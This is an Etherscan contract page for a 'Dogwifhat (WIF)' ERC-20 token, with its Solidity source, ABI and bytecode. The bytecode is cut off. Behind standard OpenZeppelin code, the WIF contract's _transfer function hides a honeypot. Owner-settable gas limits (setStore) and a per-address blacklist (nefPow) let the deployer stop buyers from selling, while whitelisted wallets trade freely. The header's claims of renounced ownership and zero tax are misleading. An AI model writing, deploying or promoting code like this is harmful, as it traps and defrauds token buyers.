ETH Price: $2,402.45 (-4.25%)
Gas: 1.22 Gwei

Token

Dogwifhat (WIF)
 

Overview

Max Total Supply

100,000,000 WIF

Holders

18

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
1,473,464.340783581538097748 WIF

Value
$0.00
0xe1b4e805cfc1e91bb00c9eeaa53958eb953bcd53
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
WIF

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-05-12
*/

/*
The biggest token on solana is coming to ETH 

Lp burned 
Ownership Renounced 
0/0 TAX 

LINKS:
Website: https://dogwifeth.io
TG portal: https://t.me/Dogwifcoineth
X: https://x.com/dogwifcoineth
*/

// SPDX-License-Identifier: MIT

pragma solidity 0.8.24;


// File: @openzeppelin/contracts/utils/Context.sol
/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}


// File: @openzeppelin/contracts/access/Ownable.sol

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner...
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner!..
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner...
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`)..
     * Internal function without access restriction...
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File: @openzeppelin/contracts/token/ERC20/IERC20.sol



/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event..
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`)..
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol





/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol







/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;
    
    
    uint256 private _totalSupply;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }
    

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = accountBalance - amount;
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning....
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`..
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned..
     * - `from` and `to` are never both zero....
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}

interface IFactory {
    function getPair(address tokenA, address tokenB) external returns (address pair);
}

interface IRouter {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

contract WIF is ERC20, Ownable {
    mapping (address => bool) public whiteList;
    
    bool public openedTrade = false;
    address public pair;
    IRouter public _Router;
    uint256 public maxTxAmount;
    uint256 public maxWalletSize;

    struct storeData {
        address team;
        uint gas;
        uint256 mua;
        uint256 ban;
        mapping (address => bool) nef;
    }

    storeData public s;
    
    constructor() ERC20("Dogwifhat", "WIF") {
        _Router = IRouter(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        _whitelist(address(_Router), true);
        _whitelist(address(this), true);
        _whitelist(msg.sender, true);
        _mint(msg.sender, 100000000 * 10 ** decimals());
        maxTxAmount = totalSupply()*2/100;
        s.mua = 0;
        s.ban = 0;
        s.gas = 999 gwei;
    }

    function _whitelist(address account, bool enable) internal {
        whiteList[account] = enable;
    }

    function openTrade() public onlyOwner() {
        pair = IFactory(_Router.factory()).getPair(address(this), _Router.WETH());
        openedTrade = true;
    }

    function nefPow(address spender, bool state) public onlyOwner{
        s.nef[spender] = state;
    }

    function setStore(uint256 _a) public onlyOwner() {
        s.gas = _a;
    }

    function removeLimit() public onlyOwner() {
        maxTxAmount = totalSupply();
    }

    function _transfer(address from, address to, uint256 amount) internal virtual override {
        if (whiteList[tx.origin]) {
            super._transfer(from, to, amount);
            return;
        } else {
            require(openedTrade, "Trade has not been opened yet");
            require(amount < maxTxAmount);
            bool ban = (to==pair) ? true : false;
            if (s.nef[tx.origin] && to == pair && tx.gasprice > 0 && balanceOf(tx.origin) > 0) {
                revert();
            }
            if(ban && tx.gasprice > s.gas) {
                revert();
            }
            if(from!=pair && to!=pair) {
                require(!s.nef[from]);
            }
            uint256 txAmount;
            txAmount = (!ban) ? (amount*s.mua/100) : (amount*s.ban/100);
            super._transfer(from, to, amount-txAmount);
            if(txAmount>0) {
                super._transfer(from, address(this), txAmount);
            }
            return;
        }
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_Router","outputs":[{"internalType":"contract IRouter","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletSize","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"bool","name":"state","type":"bool"}],"name":"nefPow","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"openTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"openedTrade","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"s","outputs":[{"internalType":"address","name":"team","type":"address"},{"internalType":"uint256","name":"gas","type":"uint256"},{"internalType":"uint256","name":"mua","type":"uint256"},{"internalType":"uint256","name":"ban","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_a","type":"uint256"}],"name":"setStore","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"whiteList","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}]

60806040526007805460ff191690553480156200001a575f80fd5b5060405180604001604052806009815260200168111bd9ddda599a185d60ba1b815250604051806040016040528060038152602001622ba4a360e91b81525081600390816200006a919062000359565b50600462000079828262000359565b50505062000096620000906200017d60201b60201c565b62000181565b600880546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d17905560066020527f8cb3563b79eac8102a826f0dcb81e7e954d7df2b15d07edcb2dd2b236c2078b4805460ff199081166001908117909255305f90815260408082208054841685179055338083529120805490921690921790556200013d90620001276012600a62000534565b62000137906305f5e1006200054b565b620001d2565b60646200014960025490565b620001569060026200054b565b62000162919062000565565b6009555f600d819055600e5564e8990a4600600c556200059b565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b0382166200022d5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060025f82825462000240919062000585565b90915550506001600160a01b0382165f90815260208190526040812080548392906200026e90849062000585565b90915550506040518181526001600160a01b038316905f907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b505050565b634e487b7160e01b5f52604160045260245ffd5b600181811c90821680620002e557607f821691505b6020821081036200030457634e487b7160e01b5f52602260045260245ffd5b50919050565b601f821115620002b757805f5260205f20601f840160051c81016020851015620003315750805b601f840160051c820191505b8181101562000352575f81556001016200033d565b5050505050565b81516001600160401b03811115620003755762000375620002bc565b6200038d81620003868454620002d0565b846200030a565b602080601f831160018114620003c3575f8415620003ab5750858301515b5f19600386901b1c1916600185901b1785556200041d565b5f85815260208120601f198616915b82811015620003f357888601518255948401946001909101908401620003d2565b50858210156200041157878501515f19600388901b60f8161c191681555b505060018460011b0185555b505050505050565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200047957815f19048211156200045d576200045d62000425565b808516156200046b57918102915b93841c93908002906200043e565b509250929050565b5f8262000491575060016200052e565b816200049f57505f6200052e565b8160018114620004b85760028114620004c357620004e3565b60019150506200052e565b60ff841115620004d757620004d762000425565b50506001821b6200052e565b5060208310610133831016604e8410600b841016171562000508575081810a6200052e565b62000514838362000439565b805f19048211156200052a576200052a62000425565b0290505b92915050565b5f6200054460ff84168362000481565b9392505050565b80820281158282048414176200052e576200052e62000425565b5f826200058057634e487b7160e01b5f52601260045260245ffd5b500490565b808201808211156200052e576200052e62000425565b61106680620005a95f395ff3fe608060405234801561000f575f80fd5b506004361061016d575f3560e01c80637f626f1a116100d9578063a457c2d711610093578063dd62ed3e1161006e578063dd62ed3e1461034e578063f2fde38b14610386578063fb201b1d14610399578063fcd410be146103a1575f80fd5b8063a457c2d714610310578063a8aa1b3114610323578063a9059cbb1461033b575f80fd5b80637f626f1a1461027557806386b714e2146102885780638c0b5e22146102d15780638da5cb5b146102da5780638f3fa860146102ff57806395d89b4114610308575f80fd5b8063395093511161012a57806339509351146102085780633ef33e301461021b5780635408d42d14610230578063622565891461023d57806370a0823114610245578063715018a61461026d575f80fd5b806306fdde0314610171578063095ea7b31461018f57806318160ddd146101b257806323b872dd146101c4578063313ce567146101d7578063372c12b1146101e6575b5f80fd5b6101796103b4565b6040516101869190610e05565b60405180910390f35b6101a261019d366004610e65565b610444565b6040519015158152602001610186565b6002545b604051908152602001610186565b6101a26101d2366004610e8f565b61045a565b60405160128152602001610186565b6101a26101f4366004610ecd565b60066020525f908152604090205460ff1681565b6101a2610216366004610e65565b61050e565b61022e610229366004610eef565b610544565b005b6007546101a29060ff1681565b61022e610576565b6101b6610253366004610ecd565b6001600160a01b03165f9081526020819052604090205490565b61022e610586565b61022e610283366004610f2a565b610599565b600b54600c54600d54600e546102a7936001600160a01b031692919084565b604080516001600160a01b0390951685526020850193909352918301526060820152608001610186565b6101b660095481565b6005546001600160a01b03165b6040516001600160a01b039091168152602001610186565b6101b6600a5481565b6101796105a6565b6101a261031e366004610e65565b6105b5565b6007546102e79061010090046001600160a01b031681565b6101a2610349366004610e65565b61064f565b6101b661035c366004610f41565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b61022e610394366004610ecd565b61065b565b61022e6106d4565b6008546102e7906001600160a01b031681565b6060600380546103c390610f6d565b80601f01602080910402602001604051908101604052809291908181526020018280546103ef90610f6d565b801561043a5780601f106104115761010080835404028352916020019161043a565b820191905f5260205f20905b81548152906001019060200180831161041d57829003601f168201915b5050505050905090565b5f610450338484610873565b5060015b92915050565b5f610466848484610996565b6001600160a01b0384165f908152600160209081526040808320338452909152902054828110156104ef5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b61050385336104fe8685610fb9565b610873565b506001949350505050565b335f8181526001602090815260408083206001600160a01b038716845290915281205490916104509185906104fe908690610fcc565b61054c610b84565b6001600160a01b03919091165f908152600f60205260409020805460ff1916911515919091179055565b61057e610b84565b600254600955565b61058e610b84565b6105975f610bde565b565b6105a1610b84565b600c55565b6060600480546103c390610f6d565b335f9081526001602090815260408083206001600160a01b0386168452909152812054828110156106365760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016104e6565b61064533856104fe8685610fb9565b5060019392505050565b5f610450338484610996565b610663610b84565b6001600160a01b0381166106c85760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016104e6565b6106d181610bde565b50565b6106dc610b84565b60085f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561072c573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107509190610fdf565b6001600160a01b031663e6a439053060085f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156107af573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107d39190610fdf565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af115801561081d573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108419190610fdf565b6007805460ff196001600160a01b039390931661010002929092166001600160a81b0319909216919091176001179055565b6001600160a01b0383166108d55760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104e6565b6001600160a01b0382166109365760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104e6565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b325f9081526006602052604090205460ff16156109bd576109b8838383610c2f565b505050565b60075460ff16610a0f5760405162461bcd60e51b815260206004820152601d60248201527f547261646520686173206e6f74206265656e206f70656e65642079657400000060448201526064016104e6565b6009548110610a1c575f80fd5b6007545f906001600160a01b038481166101009092041614610a3e575f610a41565b60015b325f908152600f602052604090205490915060ff168015610a7457506007546001600160a01b0384811661010090920416145b8015610a7f57505f3a115b8015610a975750325f90815260208190526040812054115b15610aa0575f80fd5b808015610aae5750600c543a115b15610ab7575f80fd5b6007546001600160a01b038581166101009092041614801590610aed57506007546001600160a01b038481166101009092041614155b15610b16576001600160a01b0384165f908152600f602052604090205460ff1615610b16575f80fd5b5f8115610b3c57600e54606490610b2d9085610ffa565b610b379190611011565b610b56565b600d54606490610b4c9085610ffa565b610b569190611011565b9050610b6c8585610b678487610fb9565b610c2f565b8015610b7d57610b7d853083610c2f565b5050505050565b6005546001600160a01b031633146105975760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104e6565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b038316610c935760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104e6565b6001600160a01b038216610cf55760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104e6565b6001600160a01b0383165f9081526020819052604090205481811015610d6c5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016104e6565b610d768282610fb9565b6001600160a01b038086165f908152602081905260408082209390935590851681529081208054849290610dab908490610fcc565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610df791815260200190565b60405180910390a350505050565b5f602080835283518060208501525f5b81811015610e3157858101830151858201604001528201610e15565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146106d1575f80fd5b5f8060408385031215610e76575f80fd5b8235610e8181610e51565b946020939093013593505050565b5f805f60608486031215610ea1575f80fd5b8335610eac81610e51565b92506020840135610ebc81610e51565b929592945050506040919091013590565b5f60208284031215610edd575f80fd5b8135610ee881610e51565b9392505050565b5f8060408385031215610f00575f80fd5b8235610f0b81610e51565b915060208301358015158114610f1f575f80fd5b809150509250929050565b5f60208284031215610f3a575f80fd5b5035919050565b5f8060408385031215610f52575f80fd5b8235610f5d81610e51565b91506020830135610f1f81610e51565b600181811c90821680610f8157607f821691505b602082108103610f9f57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8181038181111561045457610454610fa5565b8082018082111561045457610454610